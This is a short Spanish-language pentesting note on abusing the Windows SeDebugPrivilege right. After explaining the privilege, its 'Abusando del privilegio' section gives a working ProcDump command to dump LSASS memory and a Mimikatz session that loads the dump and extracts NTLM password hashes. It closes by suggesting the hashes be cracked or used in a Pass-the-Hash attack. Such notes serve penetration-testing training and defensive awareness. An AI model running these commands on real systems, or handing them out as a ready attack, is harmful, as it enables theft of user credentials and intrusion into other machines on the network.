SeDebugPrivilege

SeDebugPrivilege otorga a un proceso la capacidad de inspeccionar y modificar la memoria de otros procesos. Los usuarios que disponen de este derecho pueden depurar incluso programas que no les pertenecen. Por lo tanto, este privilegio debe ser concedido exclusivamente a usuarios de confianza, ya que puede permitir el acceso a información sensible del sistema.

Dado que el usuario con este derecho puede acceder a la memoria de los procesos, es posible utilizarlo para volcar el proceso LSASS, el cual contiene los hashes de las contraseñas de los usuarios que han iniciado sesión.

Abusando del privilegio

Podemos utilizar ProcDump, una herramienta de la suite SysInternals, para aprovechar este privilegio y volcar la memoria del proceso. Para ello, podemos ejecutar el siguiente comando:

procdump.exe -accepteula -ma lsass.exe lsass.dmp 

Utilizamos Mimikatz para cargar la memoria de LSASS en nuestra sesión y extraer los hashes NTLM directamente de la memoria.

C:\temp> mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Luego podemos usar los hashes extraídos para descifrarlos o usarlos para un ataque de Pass The Hash.

---

Referencias

• Debug programas